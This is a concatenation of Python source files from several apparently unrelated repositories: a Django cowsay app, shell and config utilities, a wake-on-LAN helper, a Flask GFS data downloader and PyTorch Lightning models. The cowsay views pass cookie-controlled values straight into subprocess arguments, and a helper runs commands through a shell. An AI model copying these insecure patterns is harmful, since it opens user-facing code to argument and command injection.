expected_json = json.load(fp)
v = json.loads(pbJ.dumps(self.path_helper.get_unique("/")))
self.assertEqual(v, expected_json)
with open(os.path.join(os.path.dirname(__file__), "json", "04b-ietf-serialise.json")) as fp:
expected_ietf_json = json.load(fp)
v = json.loads(pbJ.dumps(self.path_helper.get_unique("/"), mode="ietf"))
self.assertEqual(v, expected_ietf_json)
def test_005_deserialise(self):
root = self.path_helper.get_unique("/")
with open(os.path.join(os.path.dirname(__file__), "json", "05-deserialise.json"), "r") as fp:
pybindJSONDecoder.load_json(json.load(fp), None, None, obj=root)
v = json.loads(pbJ.dumps(self.path_helper.get_unique("/")))
with open(os.path.join(os.path.dirname(__file__), "json", "05-deserialise.json"), "r") as fp:
x = json.load(fp)
self.assertEqual(v, x)
def test_006_ietf_deserialise(self):
root = self.path_helper.get_unique("/")
with open(os.path.join(os.path.dirname(__file__), "json", "06-deserialise-ietf.json"), "r") as fp:
pybindJSONDecoder.load_ietf_json(json.load(fp), None, None, obj=root)
v = json.loads(pbJ.dumps(self.path_helper.get_unique("/"), mode="ietf"))
with open(os.path.join(os.path.dirname(__file__), "json", "06-deserialise-ietf.json"), "r") as fp:
x = json.load(fp)
self.assertEqual(v, x)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "JonnySueck/Cowsay",
"score": 2
} |
#### File: Cowsay/cowsay/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render
from .models import Post
from .forms import PostForm
import subprocess
# Create your views here.
def history(request):
posts = Post.objects.all()
number_of_posts = len(posts)
last = number_of_posts
first = 1
if number_of_posts > 10:
first = number_of_posts - 10
post = Post.objects.get(id=first)
cowsay_type = post.cowsay_type
message = post.text
cow = subprocess.run(['cowsay', '-f', f'{cowsay_type}',
f'{message}'], capture_output=True)
results = cow.stdout.decode()
if number_of_posts > 10:
start = number_of_posts - 10
else:
start = 0
posts = Post.objects.all()[start:last]
return render(request, 'history.html', {
'posts': posts,
'results': results
})
def index_view(request):
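    # POST: validate the form, store the post, and stash the text and cow type
    # in cookies on the confirmation response. GET: replay the visitor's last
    # post from cookies when present, otherwise show a default "Welcome!" cow.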
if request.method == 'POST':
form = PostForm(request.POST)
if form.is_valid():
data = form.cleaned_data
Post.objects.create(
text=data['text'],
cowsay_type=data['cowsay_type']
)
text = data['text']
cowsay_type = data['cowsay_type']
form = PostForm()
html = HttpResponse(
"Your post has successfully been submitted \
<a href='/'>go home</a>")
html.set_cookie('lastpost', text)
html.set_cookie('cowsay', cowsay_type)
return html
if request.COOKIES.get('lastpost'):
form = PostForm()
last_post = request.COOKIES.get('lastpost')
cowsay_type = request.COOKIES.get('cowsay')
cow = subprocess.run(['cowsay', '-f', f'{cowsay_type}',
f'{last_post}'], capture_output=True)
results = cow.stdout.decode()
message = 'welcome back to cowsay'
return render(request, 'index.html', {
'show': results, 'form': form,
'welcome': message})
shows = subprocess.run(['cowsay', 'Welcome!'],
capture_output=True)
result = shows.stdout.decode()
form = PostForm()
return render(request, 'index.html', {
'form': form,
'show': result,
})
``` |
{
"source": "JonnySueck/TwitterClone",
"score": 2
} |
#### File: TwitterClone/authentication/views.py
```python
from django.shortcuts import render
from .forms import SignupForm
from twitteruser.views import TwitterUser
# Create your views here.
def signup_view(request):
if request.method == 'POST':
form = SignupForm(request.POST)
if form.is_valid():
data = form.cleaned_data
new_user = TwitterUser.objects.create_user(
password=data['password'],
username=data['username'],
)
return render(request, 'index.html', {'user_new': new_user})
form = SignupForm()
return render(request, 'registration/signup.html', {'form': form})
``` |
{
"source": "jonnyt886/jpy",
"score": 3
} |
#### File: jonnyt886/jpy/colours.py
```python
import sys
from jpy import util
# Bash colours - taken from http://tldp.org/HOWTO/Bash-Prompt-HOWTO/x329.html
# Black 0;30 Dark Gray 1;30
# Blue 0;34 Light Blue 1;34
# Green 0;32 Light Green 1;32
# Cyan 0;36 Light Cyan 1;36
# Red 0;31 Light Red 1;31
# Purple 0;35 Light Purple 1;35
# Brown 0;33 Yellow 1;33
# Light Gray 0;37 White 1;37
# Example usage: echo -e ${COL_GRAY}This is some text${COL_NONE}
colours_dict = {
    "BLACK"   :"\033[0;30m",
"GRAY" :"\033[1;30m",
"RED" :"\033[0;31m",
"LRED" :"\033[1;31m",
"GREEN" :"\033[0;32m",
"LGREEN" :"\033[1;32m",
"BROWN" :"\033[0;33m",
"YELLOW" :"\033[1;33m",
"DBLUE" :"\033[0;34m",
"BLUE" :"\033[1;34m",
"PURPLE" :"\033[0;35m",
"LPURPLE" :"\033[1;35m",
"CYAN" :"\033[0;36m",
"LCYAN" :"\033[1;36m",
"LGRAY" :"\033[0;37m", # Already declared as 0;0m
"WHITE" :"\033[1;37m",
"NONE" :"\033[0m", # No colours
}
me = sys.modules[__name__]
for (k, v) in list(colours_dict.items()):
setattr(me, k, v)
def remove_colours(string):
    # strip every colour escape sequence defined in colours_dict
    for colour_code in colours_dict.values():
        string = string.replace(colour_code, '')
    return string
# Performs variable-expansion on a string for colour variables
# defined in this file.
# e.g. expand_colours("${GREEN}Hello my name is ${YELLOW}<NAME>${NONE}")
#
# if 'add_none' is True, this method will automatically add ${NONE} to the end
# of the string.
def expand_colours(string, add_none = True):
result = util.expand(string, colours_dict)
if add_none:
result = result + NONE
return result
```
#### File: jonnyt886/jpy/command.py
```python
from datetime import timedelta, datetime
import os, sys
from optparse import (OptionParser, OptionGroup)
import shlex, subprocess
# Contains the result of a command run using run_command().
class CommandResult:
"""
init parameters:
process: process object
stdout: string representing stdout
stderr: string representing stderr
start_time: start time (as a datetime)
finish_time: start time (as a datetime)
exit_code: process exit code
this object will also calculate:
running_time (as a timedelta)
success
"""
def __init__(self, process, stdout, stderr, start_time, finish_time, exit_code):
self.process = process
self.stdout = stdout
self.stderr = stderr
self.start_time = start_time
self.finish_time = finish_time
        self.running_time = finish_time - start_time
self.exit_code = exit_code
self.success = exit_code == 0
@property
def stdout_lines(self):
return self.stdout.split(b'\n')
@property
def stderr_lines(self):
return self.stderr.split(b'\n')
def execute(command_line, directory = None, \
print_timing_info = False, shell='/bin/bash', \
grab_output = True, ignore_exit_code = False, \
input_string = None, auto_decode=True,
decode_using=sys.stdout.encoding):
"""Run an operating system command. This is an updated
version of run_command() which returns a CommandResult
object instead of a tuple.
command_line: the command line to run. As the command
is run inside a shell, this can be a shell command
directory: if not None, change the working directory
to the one specified when making the call
grab_output: if True, wait until the command is finished
and return output as a tuple (stdout, stderr). If
False, the process can interact with the terminal
and no stdout/stderr is collected. If you want to
pass input to the process, this must be True.
    ignore_exit_code: if False, an exception is thrown if
the process exits with a non-zero exit code. If this
is true then the exit code is returned regardless of
value
input_string: a String representing input to pass into
the process - grab_output must be True for this to work
auto_decode: automatically decode the output from the
command's stdout/stderr streams using the encoding
specified by decode_using (decode_using defaults to this
script's output encoding, auto_decode defaults to True)
decode_using: the encoding used to decode stdout/stderr. Only
has an effect if auto_decode is set to True. Defaults to
sys.stdout.encoding.
"""
# For stuff we run through the shell shlex splitting doesn't work,
# so we just pass command_line straight through to bash.
#args = shlex.split(command_line)
stdout = None
stderr = None
p = None
before = datetime.now()
if grab_output:
stdout, stderr, p = _run_grab_output(command_line,
shell, directory, input_string)
else:
p = _run_no_output(command_line, shell, directory)
after = datetime.now()
if not ignore_exit_code and p.returncode != 0:
raise OSError('Command "' + str(command_line) + \
'" failed with exit code: ' + str(p.returncode))
# don't split on \n, leave it as a string
# if grab_output:
# stdout = stdout.split('\n')
# stderr = stderr.split('\n')
if auto_decode:
if stdout: stdout=stdout.decode(decode_using)
if stderr: stderr=stderr.decode(decode_using)
return CommandResult(
process=p,
stdout=stdout,
stderr=stderr,
start_time=before,
finish_time=after,
exit_code = p.returncode)
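# A minimal usage sketch for execute(); the command and path below are
# illustrative only and assume a POSIX shell is available:
#
#   result = execute('ls -l /tmp')
#   if result.success:
#       for line in result.stdout.splitlines():
#           print(line)
#   print('took', result.running_time)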
def _run_grab_output(command_line, shell, directory, input_string = None):
#print '_run_grab_output', command_line, shell, directory
if input_string == None:
stdin = None
else:
stdin=subprocess.PIPE
do_shell = (shell != None)
if do_shell: executable = shell
else: executable = None
p = subprocess.Popen(command_line, executable=executable, shell=do_shell, \
env=os.environ, cwd=directory, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=stdin)
stdout, stderr = p.communicate(input_string)
p.wait()
return stdout, stderr, p
def _run_no_output(command_line, shell, directory):
#print(('_run_no_output[command_line=', command_line, 'shell=', shell, 'dir=', directory))
do_shell = (shell != None)
if do_shell: executable = shell
else: executable = None
p = subprocess.Popen(command_line, executable=executable, shell=do_shell, \
env=os.environ, cwd=directory)
p.wait()
return p
```
#### File: jonnyt886/jpy/configfile.py
```python
import re, os
from jpy.util import expand, match_groups
from jpy.asrt import *
# Regex for values (e.g. "mykey = myval")
VALUE_REGEX = re.compile(r'\s*([^\s]+)\s*=\s*(.*)\s*')
# Comment regex (e.g. "# some comment")
COMMENT_REGEX = re.compile(r'^\s*#')
# Import regex (e.g. "import somefile")
IMPORT_REGEX = re.compile('^import (.+)$')
# Used to match trailing slashes (for line-continuation)
NEWLINE = re.compile('.*(\\\\[\\r\\n]+)$')
def convert_to_bool(s):
"""Intelligently converts a string to a bool.
All of 'yes', 'true', 'on', '1' convert to True.
All of 'no', 'false', 'off', '0' convert to False.
"""
# values for booleans
TRUE = [ 'yes', 'true', 'on', '1' ]
FALSE = [ 'no', 'false', 'off', '0' ]
t = type(s)
# deliberately don't handle None as we want to preserve
# the distinction between a bool being set and not being set
if t is bool:
return s
elif t in [list, tuple]:
if len(s) == 0: return False
s = s[0].lower()
# if we get here it must be a string, otherwise die
    asrt(t is str)
if s in TRUE: return True
elif s in FALSE: return False
else: raise ValueError('invalid boolean value: ' + str(s))
def convert_value(value, val_type):
"""Convert the given value to the correct type as determined
by config_value. Assumes that value is a string."""
# deliberately public so that other modules can call this
# always preserve None-ness
if value == None: return None
# handle bools especially
if val_type == bool:
return convert_to_bool(value)
else:
return val_type(value)
class ConfigFile(object):
def __init__(self, config_file, defaults = {},
must_exist = True, config_values = None):
"""Initialise the ConfigFile.
config_file is the path to a file that we can parse.
defaults is an optional dict of default key->value
pairs to use (added into the config file after the
file is loaded for unset keys)
must_exist, if false, allows you to create a blank
ConfigFile, in which case config_file doesn't need
to exist.
config_values, if specified, should be a list of
ConfigValue instances, which provide configuration
for settings which will be stored in this ConfigFile.
If config_values is specified:
- all settings in files loaded into the ConfigFile
must have a corresponding ConfigValue with the same
name
- all return values of get() will be converted according
to the corresponding ConfigValue's val_type
- default values will be returned by get() if the
setting requested is not present and the corresponding
ConfigValue has a default_value set
"""
self.items_dict = {}
self.must_exist = must_exist
self.config_values = None
if config_values:
self.config_values = { x.name.lower(): x for x in config_values }
# store values in a list too so that we get ordering?
self.items = []
self.config_file = config_file
self.defaults = defaults
# store the lines in the config file (just the ones
# directly in this file, not imported files) so that
# we can save the file back as it was when set() is called
self.lines = []
# dict of key -> line number (mapping to items in self.lines)
# so that set() is able to modify values in specified lines.
# this dict will not contain mappings for blank lines or comments
self.line_numbers = {}
self._read_file()
def _read_file(self):
if not self.config_file: return
exists = os.path.exists(self.config_file)
if not exists and self.must_exist:
raise ValueError('file does not exist: ' + \
self.config_file)
if exists:
previous_line = None
line_number = -1
for line in open(self.config_file, 'r'):
line_number += 1
self.lines.append(line.rstrip('\n\r'))
asrt_eq(len(self.lines)-1, line_number)
if previous_line != None:
line = previous_line + line.lstrip()
previous_line = None
newline_match = match_groups(NEWLINE, line)
if newline_match:
previous_line = line[:-len(newline_match[0])]
continue
if line.strip() == '':
continue
comment_match = COMMENT_REGEX.match(line)
value_match = VALUE_REGEX.match(line)
import_match = IMPORT_REGEX.match(line)
if comment_match != None:
# Ignore as this line is a comment line
pass
elif value_match != None:
groups = value_match.groups()
self._set_attr(groups[0], groups[1])
self.line_numbers[groups[0]] = line_number
elif import_match != None:
groups = import_match.groups()
c = ConfigFile(expand(groups[0]))
self.import_configfile(c)
else:
raise ValueError('Line "' + line + \
'" in file "' + self.config_file + \
'" is not in the right format')
for (k, v) in list(self.defaults.items()):
if not self.has(k):
self._set_attr(k, v)
def import_configfile(self, configfile, overwrite = False):
"""Import the items in another configfile into this configfile
If overwrite is True, any values that exist in this
instance and also in configfile are overwritten by the ones in
configfile. if overwrite is False, the values in this instance
are preserved.
"""
asrt(type(configfile) is ConfigFile, 'configfile must be a ConfigFile instance (was ' + str(type(configfile)) + ', ' + str(configfile) + ')')
for name, value in list(configfile.get_all().items()):
if self.has(name) and not overwrite: continue
self._set_attr(name, value)
def _set_attr(self, name, value):
if name.startswith('_'):
raise ValueError('Bad property name "' + name + '", cannot set attributes starting with _')
cv = self.get_configvalue(name)
if cv:
value = convert_value(value, cv.val_type)
self.items_dict[name] = value
def get_configvalue(self, name):
"""look up a ConfigValue
returns None if ConfigValues have not been set for this ConfigFile
"""
if not self.config_values: return None
n = name.lower()
if not n in list(self.config_values.keys()):
raise ValueError('Error in ' + self.config_file + ', property "' + name + '" invalid; no corresponding ConfigValue')
return self.config_values[n]
def get(self, name, val_type = None):
"""Retrieve a setting from the ConfigFile.
If this ConfigFile has been configured with ConfigValues,
and the corresponding ConfigValue for `name` has a default_value
set, that value is returned if it does not exist in the ConfigFile.
val_type can be specified, in which case the type of the value
returned can be specified. This is most useful in cases where
ConfigValues are being used to specify different datatypes; val_type
can be specified to make the code more readable and to give you
assurance that you'll get a certain type back.
NB In practice setting val_type does not cause conversions to be
performed. If set, the val_type is compared with the actual return
type and an exception is thrown if they do not match.
"""
result = None
if name in self.items_dict:
result = self.items_dict[name]
else:
cv = self.get_configvalue(name)
if cv: result = cv.default_value
# validate type against val_type
if val_type and (val_type != type(result)):
raise ValueError('Value for "' + name + '" is wrong type.' + \
'Expected: ' + str(val_type) + ', actual: ' + str(type(result)))
return result
def get_bool(self, name):
"""get as a boolean."""
if not self.has(name): return False
s = self.get(name)
return convert_to_bool(s)
def has(self, name):
return name in self.items_dict
def get_single(self, name):
"""Get a single property by name. An exception is thrown
if more than one property by this name exists"""
result = self.get_list(name)
if len(result) > 1:
raise ValueError('More than one value has been assigned for setting ' + name)
# values are already unpacked by get_list()
return result[0]
def get_all(self, prefix=None):
"""Get all properties. (Meaning only those defined; for example, those
where defaults have been set are *not* included in the return value
for this method.)
If prefix is specified, only return those with that prefix"""
if prefix is None:
return dict(self.items_dict)
else:
result = {}
prefixl = prefix.lower()
for (k, v) in list(self.items_dict.items()):
if k.lower().startswith(prefixl):
result[k] = v
return result
def set(self, key, value, write = True):
"""set a value in the config file and write the config file to disk
if write is False, do not write to disk, just keep the new value in
memory"""
cv = self.get_configvalue(key)
self._set_attr(key, value)
line_number = self.line_numbers.get(key)
new_line = '%s = %s' % (key, value)
if line_number is not None:
self.lines[line_number] = new_line
else:
self.lines.append('')
self.lines.append(new_line)
self.line_numbers[key] = len(self.lines)-1
if write:
with open(self.config_file, 'w') as f:
for line in self.lines:
f.write(line)
f.write('\n')
def set_with_dict(self, values, write = True):
"""set several values in the config file and write the config file to disk
if write is False, do not write to disk, just keep the new value in
memory
values should be a dict consisting of keys->values to write
"""
for key, value in list(values.items()):
cv = self.get_configvalue(key)
self._set_attr(key, value)
line_number = self.line_numbers.get(key)
new_line = '%s = %s' % (key, value)
if line_number is not None:
self.lines[line_number] = new_line
else:
self.lines.append('')
self.lines.append(new_line)
self.line_numbers[key] = len(self.lines)-1
if write:
with open(self.config_file, 'w') as f:
for line in self.lines:
f.write(line)
f.write('\n')
class ConfigValue(object):
"""Represents a configuration value (or rather, the configuration
of that configuration value)."""
def __init__(self, name, default_value = None, val_type = str):
self.name = name
self.default_value = default_value
self.val_type = val_type
# ensure the ConfigValue's default_value is the right type
if type(self.default_value) != self.val_type:
self.default_value = convert_value(self.default_value, self.val_type)
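# A minimal usage sketch (the file name and keys below are hypothetical):
#
#   values = [ConfigValue('timeout', default_value=30, val_type=int),
#             ConfigValue('verbose', default_value=False, val_type=bool)]
#   cfg = ConfigFile('app.conf', must_exist=False, config_values=values)
#   cfg.get('timeout', val_type=int)        # falls back to the default of 30
#   cfg.set('verbose', 'yes', write=False)  # stored as True via convert_to_bool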
```
#### File: jonnyt886/jpy/wakeonlan.py
```python
import struct, socket
def wakeonlan(ethernet_address):
# construct a six-byte hardware address
addr_byte = ethernet_address.split(':')
hw_addr = struct.pack('BBBBBB',
int('0x' + addr_byte[0], 16),
int('0x' + addr_byte[1], 16),
int('0x' + addr_byte[2], 16),
int('0x' + addr_byte[3], 16),
int('0x' + addr_byte[4], 16),
int('0x' + addr_byte[5], 16)
)
# build the wake-on-lan "magic packet"...
    msg = b'\xff' * 6 + hw_addr * 16
# ...and send it to the broadcast address using udp
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.sendto(msg, ('<broadcast>', 7))
s.close()
#wakeonlan('d0:27:88:61:39:b8')
``` |
{
"source": "jonnyteronni/cicd-project",
"score": 3
} |
#### File: cicd-project/src/test.py
```python
def calc(x, y):
return x + y
def test_calc():
assert 5 == calc(2, 3)
``` |
{
"source": "Jonnytoshen/wind-layer",
"score": 2
} |
#### File: src/config/grib.py
```python
import os
GFS_DATE = "20200312"  # data date
GFS_TIME = "18"  # model run (cycle) time: 00, 06, 12, 18
RES = "0p25"  # data resolution, 0p25: 0.25, 0p50: 0.5 or 1p00: 1 degree
BBOX = "leftlon=0&rightlon=360&toplat=90&bottomlat=-90"  # data extent
LEVEL = "lev_10_m_above_ground=on"  # data level
VARIABLES = "var_UGRD=on&var_VGRD=on&var_TMP=on"  # variables
GRIB_DES = "pgrb2"  # file descriptor; defaults to pgrb2, the 0.5-degree resolution uses pgrb2full
FORECASTS_TIME = "f000"
GFS_URL = "https://nomads.ncep.noaa.gov/cgi-bin/" \
"filter_gfs_${RES}.pl?file=gfs.t${GFS_TIME}z.${GRIB_DES}" \
".${RES}.${FORECASTS_TIME}&${LEVEL}&${VARIABLES}&${BBOX}&dir=%2Fgfs" \
".${GFS_DATE}%2F${GFS_TIME}"
GRS_PAGE = "https://nomads.ncep.noaa.gov/cgi-bin/" \
"filter_gfs_${RES}.pl?dir=%2Fgfs" \
".${GFS_DATE}%2F${GFS_TIME}"
OUTPUT_BASE_DIR = os.getcwd()
OUTPUT_DIR = 'static/data'
OUTPUT_JSON_DIR = 'static/json'
OUTPUT_RASTER_DIR = 'static/raster'
BASE_DIR = os.path.abspath(os.path.join(OUTPUT_BASE_DIR, OUTPUT_DIR))
BASE_JSON_DIR = os.path.abspath(os.path.join(OUTPUT_BASE_DIR, OUTPUT_JSON_DIR))
BASE_RASTER_DIR = os.path.abspath(os.path.join(OUTPUT_BASE_DIR, OUTPUT_RASTER_DIR))
def get_download_url(date, gfs_time, res, forecasts_time, bbox, level, variables):
gfs_date = date or GFS_DATE
gfs_time = gfs_time or GFS_TIME
res = res or RES
forecasts_time = forecasts_time or FORECASTS_TIME
bbox = bbox or BBOX
level = level or LEVEL
variables = variables or VARIABLES
grib_des = GRIB_DES
if res == "0p50":
grib_des = 'pgrb2full'
gfs_url = GFS_URL\
.replace("${RES}", res)\
.replace("${FORECASTS_TIME}", forecasts_time)\
.replace("${BBOX}", bbox)\
.replace("${GFS_TIME}", gfs_time)\
.replace("${GRIB_DES}", grib_des)\
.replace("${GFS_DATE}", gfs_date)\
.replace("${LEVEL}", level)\
.replace("${VARIABLES}", variables)
return {
'GFS_DATE': gfs_date,
'GFS_TIME': gfs_time,
'RES': res,
'BBOX': bbox,
'LEVEL': level,
'VARIABLES': variables,
'GFS_URL': gfs_url,
}
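# Illustrative use of get_download_url(); the date and cycle below are example
# values only, and any argument passed as None falls back to the module-level
# defaults above:
#
#   cfg = get_download_url("20200526", "00", "1p00", "f000", BBOX, LEVEL, VARIABLES)
#   print(cfg['GFS_URL'])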
def get_page_url(date, gfs_time, res):
gfs_date = date or GFS_DATE
gfs_time = gfs_time or GFS_TIME
res = res or RES
page_url = GRS_PAGE \
.replace("${RES}", res) \
.replace("${GFS_TIME}", gfs_time) \
.replace("${GFS_DATE}", gfs_date)
return page_url
def get_file_path(file_path, name):
basePath = os.path.abspath(os.path.join(OUTPUT_BASE_DIR, OUTPUT_DIR))
path = os.path.join(basePath, file_path)
full_path = os.path.join(path, name)
if os.path.exists(path):
print('basedir exist')
else:
os.makedirs(path)
if os.path.exists(full_path) and os.path.getsize(full_path):
return {
"exist": True,
"path": full_path,
}
else:
return {
"exist": False,
"path": full_path,
}
def get_json_path(file_path, name):
path = os.path.join(BASE_JSON_DIR, file_path)
full_path = os.path.join(path, name)
if os.path.exists(path):
print('basedir exist')
else:
os.makedirs(path)
if os.path.exists(full_path) and os.path.getsize(full_path):
return {
"exist": True,
"path": full_path,
}
else:
return {
"exist": False,
"path": full_path,
}
def get_raster_path(file_path, name):
path = os.path.join(BASE_RASTER_DIR, file_path)
full_path = os.path.join(path, name)
if os.path.exists(path):
print('basedir exist')
else:
os.makedirs(path)
if os.path.exists(full_path) and os.path.getsize(full_path):
return {
"exist": True,
"path": full_path,
}
else:
return {
"exist": False,
"path": full_path,
}
```
#### File: src/controller/index.py
```python
from flask import abort, jsonify, request
from flask_cors import cross_origin
from src.app import app
from src.enum.res import ResModel
from src.utils.common import check_fields
from src.config.grib import get_page_url
from src.service.index import get_gfs_params
from src.service.grib import download_data
"""
Fetch the metadata list; the raw GFS gridded data is stored as one GRIB file per time step.
"""
@app.route('/', methods=['GET', 'POST'])
@cross_origin()
def index():
return jsonify(ResModel('success').success())
"""
Download the GRIB file matching the user's parameters (note: the download only
happens on the server side; the file is not sent back to the client).
"""
DOWNLOAD_PARAMS_ENUM = [
{
'value': 'date',
'required': True
    }, # GFS date
{
'value': 'gfsTime',
'required': True
    }, # GFS cycle time
{
'value': 'res',
'required': True
    }, # resolution
{
'value': 'forecastsTime',
'required': False,
'default': 'f000'
    }, # forecast hour: hourly for the first 120 h
{
'value': 'bbox',
'required': False,
'default': '0,-90,360,90'
    }, # data extent (bbox)
{
'value': 'level',
'required': False,
'default': 'lev_10_m_above_ground'
    }, # data level
{
'value': 'variables',
'required': False,
'default': 'var_UGRD,var_VGRD'
    }, # variables to download
]
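# Illustrative request against this endpoint (all parameter values are examples
# only, matching the defaults declared above):
#   GET /download?date=20200526&gfsTime=00&res=1p00&forecastsTime=f000
#       &bbox=0,-90,360,90&level=lev_10_m_above_ground&variables=var_UGRD,var_VGRD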
@app.route('/download', methods=['GET', 'POST'])
@app.errorhandler(400)
@cross_origin()
def start_download():
method = request.method
try:
params = {}
if method == 'GET' and request.args is not None:
params = check_fields(DOWNLOAD_PARAMS_ENUM, request.args, True)
elif method == 'POST' and request.json is not None:
params = check_fields(DOWNLOAD_PARAMS_ENUM, request.json, True)
if len(params) > 0:
bbox = params['bbox'].split(',')
bbox = f"leftlon={bbox[0]}&rightlon={bbox[2]}&toplat={bbox[3]}&bottomlat={bbox[1]}"
variables = params['variables'].split(',')
            fileprefix = '-'.join(v.lower() for v in variables)
            variables = ''.join(f"{v}=on&" for v in variables)
filename = download_data(params['date'], params['gfsTime'], params['res'], params['forecastsTime'], bbox, params['level'], variables, fileprefix)
if filename['code'] == 200:
return jsonify(ResModel(filename['data']).success())
else:
                return jsonify(ResModel('no data').not_find(filename['message']))
else:
return jsonify()
except Exception as e:
return e
"""
Fetch the available parameter options.
"""
GET_PARAMS_ENUM = [
{
'value': 'date',
'required': True
    }, # GFS date
{
'value': 'gfsTime',
'required': True
    }, # GFS cycle time
{
'value': 'res',
'required': True
    }  # resolution
]
@app.route('/params', methods=['GET', 'POST'])
@app.errorhandler(400)
@cross_origin()
def get_surfaces():
method = request.method
try:
params = {}
if method == 'GET' and request.args is not None:
params = check_fields(GET_PARAMS_ENUM, request.args, True)
elif method == 'POST' and request.json is not None:
params = check_fields(GET_PARAMS_ENUM, request.json, True)
if len(params) > 0:
page_url = get_page_url(params['date'], params['gfsTime'], params['res'])
params = get_gfs_params(page_url)
return jsonify(ResModel(params).success())
else:
return jsonify()
except Exception as e:
return e
```
#### File: src/service/grib.py
```python
import os
import requests
from requests import HTTPError
from src.config.grib import get_download_url, get_file_path
from src.entity.grib import GribTable
table_db = GribTable()
def download_data(date, gfs_time, res, forecasts_time, bbox, level, variables, fileprefix):
config = get_download_url(date, gfs_time, res, forecasts_time, bbox, level, variables)
    fileprefix = fileprefix or ""
filepath = f"{date}/{gfs_time}/{res}/{forecasts_time}/"
file = get_file_path(filepath, f"{fileprefix}.grib")
dir_path = os.path.join(filepath, f"{fileprefix}.grib")
filename = file.get('path')
    # if the file already exists and its size is greater than 0, skip the download
    if file.get('exist'):
return dir_path
else:
try:
r = requests.get(config.get('GFS_URL'))
r.raise_for_status()
with open(filename, "wb") as f:
f.write(r.content)
table_db.add(date, gfs_time, res, forecasts_time, bbox, level, variables, fileprefix, dir_path)
return {
'data': dir_path,
'code': r.status_code,
'message': 'success',
}
except HTTPError as e:
# raise HTTPError("Something went wrong with the data download.") from e
return {
'code': e.response.status_code,
'message': e.args[0],
}
if __name__ == '__main__':
download_data(
'20200526',
'00',
'1p00',
'leftlon=0&rightlon=360&toplat=90&bottomlat=-90',
# 'lev_80_m_above_ground=on',
'lev_10_m_above_ground=on',
'var_UGRD=on&var_VGRD=on',
# 'var_TMP=on',
'uv'
)
print('success')
``` |
{
"source": "JonnyTran/espresso-manifold",
"score": 2
} |
#### File: src/model/autoencoder.py
```python
import numpy as np
import torch
from pytorch_lightning import LightningModule
from tsa import TimeSeriesDataset
from tsa.model import AutoEncForecast
class ShotsAutoEncForecast(AutoEncForecast, LightningModule):
def __init__(self, dataset: TimeSeriesDataset, config):
self.dataset = dataset
input_size = len(self.dataset.feature_cols)
config["output_size"] = len(dataset.target_col)
config["label_col"] = dataset.target_col
super().__init__(config, input_size)
self.criterion = torch.nn.MSELoss()
self.hparams.update(config)
def training_step(self, batch, batch_nb):
feature, y_hist, target = batch
feature = torch.nan_to_num(feature)
output = self.forward(feature, y_hist)
loss = self.criterion.forward(output, target)
self.log("loss", loss)
# self.log_dict(logs, prog_bar=True, logger=True)
return loss
def validation_step(self, batch, batch_nb):
feature, y_hist, target = batch
feature = torch.nan_to_num(feature)
output = self.forward(feature, y_hist)
loss = self.criterion.forward(output, target)
self.log("val_loss", loss)
# self.log_dict(logs, prog_bar=True, logger=True)
return loss
def test_step(self, batch, batch_nb):
feature, y_hist, target = batch
feature = torch.nan_to_num(feature)
output = self.forward(feature, y_hist)
loss = self.criterion.forward(output, target)
self.log("test_loss", loss)
# self.log_dict(logs, prog_bar=True, logger=True)
return loss
def train_dataloader(self):
self.train_iter, self.test_iter, n_features = self.dataset.get_loaders(
batch_size=self.hparams["batch_size"], num_workers=4)
return self.train_iter
def val_dataloader(self):
self.train_iter, self.test_iter, n_features = self.dataset.get_loaders(
batch_size=self.hparams["batch_size"], num_workers=4)
return self.test_iter
def test_dataloader(self):
self.train_iter, self.test_iter, n_features = self.dataset.get_loaders(
batch_size=self.hparams["batch_size"], num_workers=4)
return self.test_iter
def get_n_params(self):
model_parameters = filter(lambda tup: tup[1].requires_grad and "embedding" not in tup[0],
self.named_parameters())
params = sum([np.prod(p.size()) for name, p in model_parameters])
return params
def configure_optimizers(self):
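        # Split parameters into two optimizer groups: ordinary weights receive the
        # configured weight decay, while biases, normalisation parameters and
        # embeddings (matched by the name fragments in no_decay) get zero decay.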
param_optimizer = list(self.named_parameters())
no_decay = ['bias', 'alpha_activation', 'batchnorm', 'layernorm', "activation", "embedding",
'LayerNorm.bias', 'LayerNorm.weight',
'BatchNorm.bias', 'BatchNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for name, p in param_optimizer \
if not any(key in name for key in no_decay) \
and "embeddings" not in name],
'weight_decay': self.hparams['weight_decay']},
{'params': [p for name, p in param_optimizer if any(key in name for key in no_decay)],
'weight_decay': 0.0},
]
optimizer = torch.optim.Adam(optimizer_grouped_parameters, lr=self.hparams["lr"])
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=self.hparams['lrs_step_size'], gamma=0.5)
return {"optimizer": optimizer, 'lr_scheduler': scheduler, "monitor": "val_loss"}
``` |
{
"source": "JonnyTran/LATTE",
"score": 2
} |
#### File: JonnyTran/LATTE/metrics.py
```python
import numpy as np
import torch
import torchmetrics
from ignite.exceptions import NotComputableError
from ignite.metrics import Precision, Recall, TopKCategoricalAccuracy
from ogb.graphproppred import Evaluator as GraphEvaluator
from ogb.linkproppred import Evaluator as LinkEvaluator
from ogb.nodeproppred import Evaluator as NodeEvaluator
from pytorch_lightning.metrics import F1, AUROC, AveragePrecision, MeanSquaredError, Accuracy
from sklearn.metrics import homogeneity_score, completeness_score, normalized_mutual_info_score, \
adjusted_mutual_info_score
from utils import filter_samples
def clustering_metrics(y_true, y_pred, metrics=["homogeneity", "completeness", "nmi", "ami"]):
results = {}
for metric in metrics:
if "homogeneity" in metric:
results[metric] = homogeneity_score(y_true, y_pred)
elif "completeness" in metric:
results[metric] = completeness_score(y_true, y_pred)
elif "nmi" in metric:
results[metric] = normalized_mutual_info_score(y_true, y_pred, average_method="arithmetic")
elif "ami" in metric:
results[metric] = adjusted_mutual_info_score(y_true, y_pred)
return results
class Metrics(torch.nn.Module):
def __init__(self, prefix, loss_type: str, threshold=0.5, top_k=[1, 5, 10], n_classes: int = None,
multilabel: bool = None, metrics=["precision", "recall", "top_k", "accuracy"]):
super().__init__()
self.loss_type = loss_type.upper()
self.threshold = threshold
self.n_classes = n_classes
self.multilabel = multilabel
self.top_ks = top_k
self.prefix = prefix
self.metrics = {}
for metric in metrics:
if "precision" == metric:
self.metrics[metric] = Precision(average=True, is_multilabel=multilabel)
elif "recall" == metric:
